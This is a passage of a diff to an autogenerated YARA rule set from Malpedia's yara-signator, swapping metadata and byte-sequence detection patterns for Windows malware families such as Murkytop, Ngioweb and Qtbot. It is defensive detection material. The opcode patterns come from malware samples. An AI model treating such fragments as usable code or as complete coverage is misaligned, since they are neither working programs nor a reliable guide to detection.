+ $sequence_10 = { 50 e8???????? 59 8bd8 33c0 } + $sequence_11 = { 85db 7404 8bc3 eb07 } + $sequence_12 = { 011f 59 8bc3 c1e003 01866caf0100 } + $sequence_13 = { 014f18 8b4714 85c0 0f854e010000 } + $sequence_14 = { 014110 5f 5e 5b } + $sequence_15 = { 01590c 8b45f0 014110 5f } condition: - 7 of them and filesize <262144 + 7 of them and filesize <1753088 } -rule MALPEDIA_Win_Chinotto_Auto : FILE +rule MALPEDIA_Win_Murkytop_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "eb163619-c453-5aad-acb2-63f8cb2fc096" + id = "98a068e3-7271-5cdb-a55e-1253046c8910" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinotto" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chinotto_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.murkytop_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "68ff4e71579a9ee7d4f8a0767737ed2f326ba91b5ade5aa40e96479fa8db4fb8" + logic_hash = "c9438f0871f1117619cdcbc50e1d21cb20b4d3848dd8784e1c0798685d05cf91" score = 75 quality = 75 tags = "FILE" @@ -167255,32 +170099,32 @@ rule MALPEDIA_Win_Chinotto_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 034d0c 53 56 57 8b7848 8b774c } - $sequence_1 = { 6a1a e8???????? 8bd8 b906000000 be???????? 8bfb f3a5 } - $sequence_2 = { c745f800000000 8955c8 85d2 7505 ba02000000 8b461c 8bf8 } - $sequence_3 = { 57 8945f0 8d5801 740e 8b4e1c 2b4e40 } - $sequence_4 = { 837dfc00 7514 837dd000 0f8421080000 837e2000 0f8417080000 } - $sequence_5 = { 8d8dd0fbffff 68???????? 51 ffd6 83c418 8d95a4f1ffff 52 } - $sequence_6 = { 8b5620 57 8b7e24 8bc2 0bc7 7412 8bc2 } - $sequence_7 = { 8a08 40 84c9 75f9 2bc7 8b7d18 } - $sequence_8 = { 83c434 5f 5e 33cd 8d85e0fdfcff 5b } - $sequence_9 = { 8b471c 50 0fafc1 034710 8d55f8 } + $sequence_0 = { 7c17 b8555555d5 f7e9 c1fa02 8bc2 c1e81f 03c2 } + $sequence_1 = { 56 e8???????? 83c410 8b9d1befffff 8d9c1defeeffff 33f6 8bff } + $sequence_2 = { 83e01f c1f905 8b0c8de0f54100 c1e006 0fbe440104 83e040 } + $sequence_3 = { 8d4508 50 6a00 57 6a00 6800130000 ff15???????? } + $sequence_4 = { 56 ffd7 50 ff15???????? 85c0 0f850b010000 } + $sequence_5 = { 8b1d???????? 56 57 8bf8 8d45f8 } + $sequence_6 = { 8b3d???????? 8bc7 85ff 7e16 8d0cfd48f54100 8b11 } + $sequence_7 = { c1fa02 8955d4 3bdf 754e } + $sequence_8 = { 897de4 c745e014000000 897dec 894dd8 8945dc } + $sequence_9 = { c1e106 030c9de0f54100 eb02 8bca f641247f 7526 83f8ff } condition: - 7 of them and filesize <300032 + 7 of them and filesize <294912 } -rule MALPEDIA_Win_Pocodown_Auto : FILE +rule MALPEDIA_Win_Deltas_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "57027d9b-6e81-5ca8-a0ac-bbfd288eda02" + id = "7da5df4e-29e3-54c4-9a20-6a6e85d7900e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pocodown_auto.yar#L1-L101" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.deltas_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "d2d2c3510515a24653939603c26fb696816a72e2a82e1c859f658b0238b45291" + logic_hash = "dd0f3991acf6e3d198b5d6cf834071e4c8ad802b2fea2e9cf5d21d8d4fb219f6" score = 75 quality = 75 tags = "FILE" @@ -167294,30 +170138,32 @@ rule MALPEDIA_Win_Pocodown_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b84248c000000 ffc8 898424a0010000 c784248800000000000000 ba01000000 488b8c24e0010000 } - $sequence_1 = { 8b84248c000000 ffc8 8984248c000000 83bc248c00000007 0f875d010000 486384248c000000 } - $sequence_2 = { 8b842490000000 25ff000000 488b4c2430 884101 } - $sequence_3 = { 8b84248c020000 8944244c 488b8c2420030000 e8???????? } - $sequence_4 = { 8b842490000000 2500040000 85c0 740a c744245000000000 eb0a 8b442448 } - $sequence_5 = { 8b84248c020000 448bc0 ba5c000000 488d8c24f0010000 e8???????? } - $sequence_6 = { 8b84248c020000 448bc0 488d9424f0010000 488d8c24a0020000 e8???????? } - $sequence_7 = { 8b842490000000 39442420 0f83e0000000 488d442438 41b808000000 488b542440 } + $sequence_0 = { 8d542434 898424d8000000 52 ffd6 898424d0000000 8d442458 50 } + $sequence_1 = { b22e b06c 51 c644240c77 c644240d73 c644240f5f c644241033 } + $sequence_2 = { c684241002000000 f3ab 66ab aa 8d442408 6804010000 50 } + $sequence_3 = { 8d742438 8dbc24f4000000 33c0 f3a5 b908000000 8d7c2418 } + $sequence_4 = { 68???????? 68???????? 50 ffd7 8d8c241c020000 6804010000 8d94241c010000 } + $sequence_5 = { 57 33f6 b922000000 33c0 } + $sequence_6 = { 52 ffd6 898424e0000000 8d442440 50 ffd6 } + $sequence_7 = { 894c242d 56 66894c2435 33f6 89442420 884c2437 57 } + $sequence_8 = { 0bc1 33c7 0344242c 8d8410442229f4 8bd0 c1e006 c1ea1a } + $sequence_9 = { c644245400 c684245801000000 f3ab 66ab } condition: - 7 of them and filesize <6703104 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Flawedgrace_Auto : FILE +rule MALPEDIA_Win_Ngioweb_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "62521b13-13e2-5f89-b92f-7685ad3e5d40" + id = "1a04caa4-5f94-5038-893b-b414574d57bc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flawedgrace_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ngioweb_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "3a2e50b467b7ecb293ee257669feacddf7970c96ed36da3edcb02bab7c5dbcd0" + logic_hash = "53b049f61ecbdc954b47598eb5e1d9de9a9f52f58bb1ef6f666338c0ff24b7f4" score = 75 quality = 75 tags = "FILE" @@ -167331,32 +170177,32 @@ rule MALPEDIA_Win_Flawedgrace_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 894110 8b450c 89411c 8a03 884124 8b45f4 c7411800000000 } - $sequence_1 = { c1e810 0fb6c0 330c85e0bb4500 0fb6c2 c1ea08 330c85e0b34500 334fb8 } - $sequence_2 = { ff15???????? 8bf8 85ff 0f8493000000 8bce e8???????? 8d5704 } - $sequence_3 = { 50 8b85c0feffff ff7004 50 e8???????? 8b55e8 } - $sequence_4 = { c68564dcffffda c68565dcffff02 c68566dcffff48 c68567dcffff65 c68568dcffff61 c68569dcffff70 c6856adcffff52 } - $sequence_5 = { c6857fcfffff48 c68580cfffff83 c68581cfffffec c68582cfffff20 c68583cfffff4c c68584cfffff8b c68585cfffffc8 } - $sequence_6 = { 3355f0 33da 8955e8 330c85e0d34500 8bc2 898eb0000000 8bca } - $sequence_7 = { c6852ee8ffff65 c6852fe8ffff6c c68530e8ffff6f c68531e8ffff63 c68532e8ffff00 c68533e8ffff00 c68534e8ffff50 } - $sequence_8 = { 8975fc e8???????? 50 83c010 50 51 } - $sequence_9 = { c68516e5ffff00 c68517e5ffff00 c68518e5ffff00 c68519e5ffff00 c6851ae5ffff00 c6851be5ffff00 c6851ce5ffff00 } + $sequence_0 = { 8b4604 897808 eb15 894f08 8b06 89780c 893e } + $sequence_1 = { 394518 89b39c000000 c783a800000001000000 8983b0000000 7412 50 6884000000 } + $sequence_2 = { ffd0 85c0 7554 ff75fc 53 } + $sequence_3 = { 66c745ae6300 66c745ac5400 668975aa 66895dc4 e8???????? 33c0 } + $sequence_4 = { 668b460c 895f04 8d5f08 53 668907 ff7608 } + $sequence_5 = { 3bc7 7574 689f860100 6810270000 8d4508 50 } + $sequence_6 = { 53 8b5d24 68b9ed740a 56 e8???????? ff7518 ff7514 } + $sequence_7 = { ff75f0 ff15???????? ff15???????? 8b45e8 eb02 33c0 5f } + $sequence_8 = { 8bc3 5b 5d c21400 57 8b7c2408 85ff } + $sequence_9 = { 770b 0fb7c0 668b4445d8 668906 46 46 49 } condition: - 7 of them and filesize <966656 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Icexloader_Auto : FILE +rule MALPEDIA_Win_Ghole_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f5f07cf1-ebb8-58bc-85cf-c8730868788c" + id = "4005edf0-acd5-5930-97fb-055e6ab03b5d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icexloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.icexloader_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ghole_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "3e81383223a4cc1ff73f88f3e7f296bd8191bce05edbae01407537facee45b04" + logic_hash = "a19f9cff11c120a5d0a63f0160508dc83f879d2586d9f0ffa0e72d02e6aa023f" score = 75 quality = 75 tags = "FILE" @@ -167370,32 +170216,32 @@ rule MALPEDIA_Win_Icexloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 750c 83caff 85c9 7405 8b01 8d50ff 8b4508 } - $sequence_1 = { 8985acfeffff 8b85c4feffff 8b10 894c2408 8b8db4feffff 890424 894c2404 } - $sequence_2 = { 8b4520 8910 c745e001000000 eb0a 90 eb07 90 } - $sequence_3 = { e8???????? ba04000000 0fb7c0 40 8985d0e6ffff 8b85e4e6ffff e8???????? } - $sequence_4 = { c705????????04000000 66c705????????1903 c605????????01 c705????????14000000 c705????????e0d74300 c705????????aa914200 } - $sequence_5 = { 55 ba7c000000 89e5 56 53 83ec30 894de4 } - $sequence_6 = { c705????????00d44300 c705????????95904200 c705????????18e44300 c605????????01 c705????????00000000 c705????????80d44300 c705????????9d904200 } - $sequence_7 = { 83bd14ffffff00 7405 e8???????? e8???????? 8b8d64feffff e8???????? e8???????? } - $sequence_8 = { 57 56 89d6 ba01000000 53 89cb 83ec2c } - $sequence_9 = { b8???????? e8???????? ba0c000000 8d45a4 e8???????? ba???????? b9???????? } + $sequence_0 = { 740d 8b55fc 48 8b45e8 89908c000000 48 8b55e0 } + $sequence_1 = { 3b45ec 7591 48 8b05???????? 48 8b00 8b15???????? } + $sequence_2 = { 89c7 e8???????? 85c0 0f85ac160000 8b850cfdffff 48 8d9518fdffff } + $sequence_3 = { 90 8b4dc8 8b55c4 48 8b5d98 48 8b4598 } + $sequence_4 = { 8910 48 8b45e8 48 83c018 48 8b55e8 } + $sequence_5 = { 85c0 7518 8b45e0 89c7 e8???????? 85c0 750a } + $sequence_6 = { 48 8b45e0 48 895010 48 8d55d4 48 } + $sequence_7 = { 894c2408 48 83ec78 c744242050000000 c744242403000000 48 8d0540feffff } + $sequence_8 = { 4c 8945c0 c745ec00000000 8b05???????? 85c0 750a b800000000 } + $sequence_9 = { 0f847d0f0000 48 8d95a0faffff 48 8d8520fdffff 48 89d6 } condition: - 7 of them and filesize <656384 + 7 of them and filesize <622592 } -rule MALPEDIA_Win_Cohhoc_Auto : FILE +rule MALPEDIA_Win_Postnaptea_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b68a758f-10e4-5b26-9336-04dc8575909c" + id = "66a4e77d-c854-5ed3-94ad-0ea65d80b627" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cohhoc_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.postnaptea" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.postnaptea_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "ecae8715f2ad96196b29dfd6ae017f72fc211d8d4ab8ab2002ae190526566a13" + logic_hash = "8a33afe097a88ce8212670a3e80b58d6a5513693490a76a85e445ee8529ba924" score = 75 quality = 75 tags = "FILE" @@ -167409,32 +170255,32 @@ rule MALPEDIA_Win_Cohhoc_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 1bc0 83d8ff 85c0 0f84fb000000 bf???????? 8db424b4010000 8a0e } - $sequence_1 = { 5b 81c49c020000 c3 8b542410 } - $sequence_2 = { e8???????? 50 6801010000 8bcd e8???????? 8bcd } - $sequence_3 = { 33c0 5b 83c444 c3 8b542434 8b442458 6a00 } - $sequence_4 = { 817c240c03010000 0f8494010000 8b35???????? 8d442410 53 50 68???????? } - $sequence_5 = { 66c74424040010 8974242c 89742430 8b442448 8b4c2444 50 } - $sequence_6 = { bf01000000 6a00 68???????? ffd6 85ff } - $sequence_7 = { 88442424 894c2430 8b4c2424 57 51 8b4c2428 e8???????? } - $sequence_8 = { 6a07 51 6a00 aa } - $sequence_9 = { 8bc8 8d8424b4010000 83e103 f3a4 be???????? 8a10 8aca } + $sequence_0 = { c744247418f561f5 c744247867f50000 4863c2 488d4c2450 488d0c41 0fb7c2 662bc3 } + $sequence_1 = { ffc2 83fa1a 72e3 6644896c2474 488d442440 488bd3 0f1f440000 } + $sequence_2 = { ffd7 85c0 0f842c010000 4c8d052d4b0600 ba04010000 498bce e8???????? } + $sequence_3 = { e9???????? 418b8520280000 4d8bce 48634c2440 4c8bc6 2bc1 48034c2460 } + $sequence_4 = { c745c000f50cf5 c745c407f528f5 c745c80cf508f5 c745cc02f53cf5 c745d006f50bf5 c745d419f50bf5 c745d81bf54ef5 } + $sequence_5 = { ff15???????? 4533e4 4d85f6 0f8418100000 498bce e9???????? 448b85b0000000 } + $sequence_6 = { c7851001000031f56df5 c785140100006df54ef5 c7851801000005f50ef5 c7851c0100000ff50000 418bd4 0f1f440000 4863c2 } + $sequence_7 = { c78520020000a081b081 c78524020000a281ba81 c78528020000fa81b181 c7852c020000ba81bb81 33c0 66898530020000 418bd5 } + $sequence_8 = { 488b05???????? 4885c0 7515 488d55b0 b9bd59e821 e8???????? 488905???????? } + $sequence_9 = { ffd7 c7856007000079f57af5 c785640700007bf515f5 c785680700000df528f5 c7856c0700006bf540f5 c7857007000020f506f5 c7857407000007f516f5 } condition: - 7 of them and filesize <253952 + 7 of them and filesize <2457600 } -rule MALPEDIA_Win_Atomsilo_Auto : FILE +rule MALPEDIA_Win_Compfun_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5c5abdc6-8981-5d86-b9f4-d4db3c6db3a6" + id = "b70b97d4-0cf0-525a-92ea-8899bccf1319" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atomsilo_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.compfun_auto.yar#L1-L161" license_url = "N/A" - logic_hash = "12073cc9a4e235a243c621f25e39a1bc781a5d45de9a635e40dc44153d51bb08" + logic_hash = "a0b696c7a840205849cf5ac2e95df1021718fd8d1c1053a2c6b648baa042ec58" score = 75 quality = 75 tags = "FILE" @@ -167448,32 +170294,38 @@ rule MALPEDIA_Win_Atomsilo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 90 488d054b810900 488903 488d0571780900 48894308 48c74338ffffffff } - $sequence_1 = { 4403e8 498b17 48638c24a0000000 4803ca 49890f 483bca 731c } - $sequence_2 = { 4d8bc4 488bd7 488d8d50010000 e8???????? b930000000 e8???????? 488bd8 } - $sequence_3 = { 488b7dd0 4885c9 741d 488d51ff 488d14d7 0f1f440000 48833a00 } - $sequence_4 = { 0409 83f052 8844245d 8b442450 040a 83f045 8844245e } - $sequence_5 = { 488d05dd6c0700 488907 488bc7 0f104318 488b5c2430 f30f7f4718 4883c420 } - $sequence_6 = { 4156 4883ec50 488b5830 498bf9 498bf0 4c8bf2 4c8be1 } - $sequence_7 = { 488d15e7b60500 0fb60c0a c1e103 4863c9 488d1546720900 33440a03 8944243c } - $sequence_8 = { 0f94c0 480106 ebc0 488b7c2438 4c8b8424f0000000 4c8b9c24c8000000 4c8b9424d0000000 } - $sequence_9 = { 4883ec28 83792801 8b4228 7423 83f801 740f e8???????? } + $sequence_0 = { 8d857cfeffff 50 8d857cffffff 50 e8???????? 59 50 } + $sequence_1 = { c7460c65726174 c746106f722063 c746146c617373 c6461800 8bc6 5e } + $sequence_2 = { 56 e8???????? 83c40c c74608697a6520 c70647657446 c74604696c6553 c6460b00 } + $sequence_3 = { c7460472656174 c7460865557365 c7460c72546872 c6461300 } + $sequence_4 = { e8???????? 83c40c c7460c33322020 c706496e7072 } + $sequence_5 = { 6880000000 6a00 56 e8???????? 83c40c c70647657446 c74604756c6c50 } + $sequence_6 = { c6460f00 8bc6 5e 5d c3 55 } + $sequence_7 = { c7460825202020 c70625415050 c7460444415441 c6460900 8bc6 5e } + $sequence_8 = { 034c2460 488b442450 894820 488b4c2450 } + $sequence_9 = { 03c1 4863d0 488b4c2430 488b442438 } + $sequence_10 = { 03c1 89442420 8b442420 83c001 } + $sequence_11 = { 03c1 89442420 8b4c2438 488b442450 } + $sequence_12 = { 03c1 89442420 8b542438 486bd218 } + $sequence_13 = { 034c242c 488b442470 894820 488d542440 } + $sequence_14 = { 03c1 89442434 8b442430 39442434 } + $sequence_15 = { 0344242c 8bc8 e8???????? 4889442448 } condition: - 7 of them and filesize <1785856 + 7 of them and filesize <402432 } -rule MALPEDIA_Win_Lethic_Auto : FILE +rule MALPEDIA_Win_Comebacker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "89881c0c-ddd2-5773-9144-03db6590b3cc" + id = "af10d661-f74a-5650-87c7-273e1e7e9537" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lethic_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.comebacker_auto.yar#L1-L159" license_url = "N/A" - logic_hash = "3125ec39e54752d0947a08a6149f6c0dbb19d9ccd38ebef90b278b6227c3cc5c" + logic_hash = "4674cd33cc3ed96f3f2fa7f30959d540c5b651afcce920e84c014122f3c7af23" score = 75 quality = 75 tags = "FILE" @@ -167487,32 +170339,37 @@ rule MALPEDIA_Win_Lethic_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 837df400 7507 33c0 e9???????? 8b55f4 8b4218 } - $sequence_1 = { 33c0 e9???????? 8b45fc 8b4d10 894804 } - $sequence_2 = { 50 8b4dfc 83c108 51 8b55f4 } - $sequence_3 = { 8b45fc 8b08 894dfc ebec 8b55fc } - $sequence_4 = { eb42 6a10 8b55fc 83c208 52 } - $sequence_5 = { ebec 8b55fc 8b45f4 8b08 890a 8b55fc } - $sequence_6 = { 8945fc c745f801000000 837dfc00 7507 33c0 e9???????? 8b45fc } - $sequence_7 = { 3b55f8 7411 8b45fc c60000 } - $sequence_8 = { 8b08 890a 8b55fc 8b02 8945fc 8b4df4 51 } - $sequence_9 = { eb42 6a10 8b55fc 83c208 52 8b45fc 8b4818 } + $sequence_0 = { 6683f809 7f04 0430 eb02 } + $sequence_1 = { 4c8d0d7ad60300 8d5049 8d48e0 448d4013 c7442420bb020000 e8???????? } + $sequence_2 = { 41894704 418bc4 48c1e810 0fb6c8 418bc0 0fb6943170e30400 } + $sequence_3 = { 4c8d0dc2a10300 8d5078 8d4803 448d4041 } + $sequence_4 = { 4c8d9db0070000 488d8580020000 4c895c2440 89742438 4489742430 } + $sequence_5 = { 3241ff 48ffca 88440bff 75ed 488bfe } + $sequence_6 = { 4c8d0daf4d0300 baca000000 b910000000 e8???????? 488bcf } + $sequence_7 = { 4c89ac2408290300 664489b5a0050000 e8???????? 488d8d92030000 } + $sequence_8 = { ff15???????? 83bdc4f8ffff00 741c 68???????? e8???????? 69c0e8030000 83c404 } + $sequence_9 = { c74424183ba7ca84 c744241c85ae67bb c74424202bf894fe c744242472f36e3c } + $sequence_10 = { 8a44242a 8b1c8d38640410 8b048538600410 8bca 33c3 } + $sequence_11 = { 8d1433 52 50 ff15???????? 85c0 0f8435ffffff 8b15???????? } + $sequence_12 = { 68???????? 52 ffd7 8d85fcf7ffff 83c408 8d5002 668b08 } + $sequence_13 = { 83f906 0f87c1000000 ff248d302a0210 8b4810 85c9 74d6 8b490c } + $sequence_14 = { 8b8dacfeffff 51 e8???????? 8b9db0feffff } condition: - 7 of them and filesize <81920 + 7 of them and filesize <1429504 } -rule MALPEDIA_Win_Aveo_Auto : FILE +rule MALPEDIA_Win_Hui_Loader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "20a83532-4a6e-562c-b0b0-f75c536df8d1" + id = "175084ea-2a45-5f42-bda4-3cc233036dd9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.aveo_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hui_loader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hui_loader_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "0a926409298a7da9832c13e4dae3f40393311db59f4c541fcfd58f63e4b0b943" + logic_hash = "96ca3a225904ad2e70a598c1b3c7fa88d26822a60a6742e1663517bed35c0526" score = 75 quality = 75 tags = "FILE" @@ -167526,34 +170383,34 @@ rule MALPEDIA_Win_Aveo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b85ecfaffff 83c40c 50 8bcb 51 8db5f8fdffff } - $sequence_1 = { 53 56 57 8db570faffff } - $sequence_2 = { 8d8d10feffff e8???????? 8b95f8fdffff 52 8bf0 } - $sequence_3 = { 8b4de0 8d55dc 52 6800008000 } - $sequence_4 = { 8d8554faffff 8d8d70faffff e8???????? 8b955cfaffff 52 e8???????? } - $sequence_5 = { 50 f3a4 ff15???????? 6800010000 8d8df8feffff 6a00 51 } - $sequence_6 = { 53 8d4802 8955f4 56 8a51fe } - $sequence_7 = { 7424 8b85f4efffff 3bc7 741a } - $sequence_8 = { c7442418e8030000 ff15???????? 3bc7 740c 68???????? 50 } - $sequence_9 = { c7430801000000 e8???????? 6a06 89430c 8d4310 8d89d41a4100 5a } + $sequence_0 = { 68???????? 51 8bf8 ffd5 8d9424b8010000 8d842488090000 } + $sequence_1 = { ffd0 68e8030000 ffd6 8b0d???????? 51 ff15???????? 5f } + $sequence_2 = { 8b1402 3bd3 7406 c70109000000 } + $sequence_3 = { 83e01f c1f905 8d04c0 8b0c8d60e20010 8d44810c 50 } + $sequence_4 = { 52 50 a3???????? ff15???????? a1???????? } + $sequence_5 = { 83c628 83f90a 7cd9 33d2 } + $sequence_6 = { 8d4a01 0338 83c004 49 75f8 42 83c628 } + $sequence_7 = { c20400 8b15???????? 33c0 68???????? 52 } + $sequence_8 = { ff15???????? a3???????? 33ff 8d4c2428 } + $sequence_9 = { 7e0f 8b4efc 8b5401fc 031401 8b0e 891401 } condition: - 7 of them and filesize <180224 + 7 of them and filesize <131072 } -rule MALPEDIA_Win_Bleachgap_Auto : FILE +rule MALPEDIA_Win_Qtbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1c7bcc3b-871c-5292-a898-130d22929e4c" + id = "ec8aa97a-290d-593c-aa5f-6c160f3c38cf" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bleachgap" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bleachgap_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.qtbot_auto.yar#L1-L168" license_url = "N/A" - logic_hash = "feb4beb187c6596a9fcad947329bf36b55b60b3bae8b02c6a93cdc46dd85c07a" - score = 75 - quality = 75 + logic_hash = "2c7689c956559567f13a9ec6cae95c5c067935d56f8491bff1983eb40f5f2838" + score = 60 + quality = 25 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -167565,32 +170422,38 @@ rule MALPEDIA_Win_Bleachgap_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bec ff750c e8???????? 8bc8 83f9ff 7506 32c0 } - $sequence_1 = { c645fc04 8b8d70fbffff 83f910 722f 8b955cfbffff 41 8bc2 } - $sequence_2 = { e9???????? ff7104 8d442414 6800010000 50 e8???????? 8d442410 } - $sequence_3 = { c68539ffffff7a c6853affffff5f c6853bffffff55 c6853cffffff41 c6853dffffff57 c6853effffff3c c6853fffffff41 } - $sequence_4 = { eb0d 8b450c 8945b8 c745b400000000 84c9 8d4dd4 0f44f2 } - $sequence_5 = { c6431000 894924 c645fc02 8d45e0 c645e801 0f57c0 660fd607 } - $sequence_6 = { 88442426 8b442410 0413 3457 88442427 8b442410 0414 } - $sequence_7 = { b801000000 d3e0 8502 0f8459ffffff 8b4614 8b5714 8b0e } - $sequence_8 = { ff750c 50 e8???????? 83c410 85c0 0f84d9010000 53 } - $sequence_9 = { 8a13 8bc1 8b4df0 43 41 894df4 3810 } + $sequence_0 = { 89450c 8d4301 0fb6d8 8a941dfcfeffff 0fb6c2 } + $sequence_1 = { 75e9 5b 5d c20400 } + $sequence_2 = { 25ffffff00 42 8a1a 84db } + $sequence_3 = { 8b049a 03c6 50 e8???????? } + $sequence_4 = { 33c0 53 8a1a 6bc80d 0fb6c3 83c0d0 } + $sequence_5 = { 03d6 8b481c 8b4018 03ce } + $sequence_6 = { 40 89450c 83ef01 75b1 8b4510 5f 5e } + $sequence_7 = { 85ff 7455 8b4510 89450c } + $sequence_8 = { 894dfc eb0e 8b14957c300010 49 0fafd1 0155fc } + $sequence_9 = { 8bd8 8d7e08 7504 8b2f eb02 } + $sequence_10 = { 0fb6805a210010 ff2485f6200010 8b8614080000 3b45f4 7e03 8945f4 8365fc00 } + $sequence_11 = { 6a00 ff15???????? 833e05 7521 6a10 6a40 ff15???????? } + $sequence_12 = { 8db720080000 833e00 751e 837efcff 7518 8b46f8 8b04855c300010 } + $sequence_13 = { 8b46f8 834de4ff 49 c745e8ff000000 8b3c857c300010 } + $sequence_14 = { 33c0 8b7df4 8b0c855c300010 c1e705 33d2 03fe } + $sequence_15 = { e8???????? 59 837e04ff 8bd8 8d7e08 } condition: - 7 of them and filesize <4538368 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Godzilla_Loader_Auto : FILE +rule MALPEDIA_Win_Usbferry_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0aa53e21-de31-5ee8-9359-dc9a54a6a8e0" + id = "62065071-13fe-542b-a291-fb80bd43202d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.godzilla_loader_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry" + source_url = 